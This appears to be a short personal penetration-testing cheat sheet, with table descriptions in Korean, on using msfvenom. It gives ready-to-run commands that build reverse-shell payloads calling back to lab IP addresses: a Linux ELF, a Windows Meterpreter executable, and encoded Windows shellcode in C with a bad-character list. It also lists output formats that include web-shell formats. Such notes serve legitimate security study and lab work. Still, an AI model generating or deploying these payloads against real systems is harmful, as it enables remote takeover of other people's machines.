#metasploit #msfvenom #shellcode [[Encoder]] #payload
### Using msfvenom
```bash
msfvenom -p <payload> LHOST=<IP> LPORT=<PORT> -f <FORMAT> -o <FILE_NAME>
# Linux elf
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f elf -o shell.elf
# Windows exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f exe -o shell.exe
# Shellcode C
msfvenom -p windows/shell_reverse_tcp -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" LHOST=192.168.45.211 LPORT=4444 -e x86/alpha_mixed -f c
```
| 포맷 (`-f`) | 설명 |
| --------------------------- | ----------------- |
| `-b` | bad characters 제외 |
| `-e` <encoder_name> | |
| `elf` | 리눅스 실행 파일 |
| `exe` | 윈도우 실행 파일 |
| `c` | C 배열 형태 |
| `python` | 파이썬 코드용 |
| `raw` | 순수 쉘코드 바이너리 |
| `hex` | 헥사 문자열 |
| `asp`, `aspx`, `php`, `war` | 웹쉘 페이로드용 |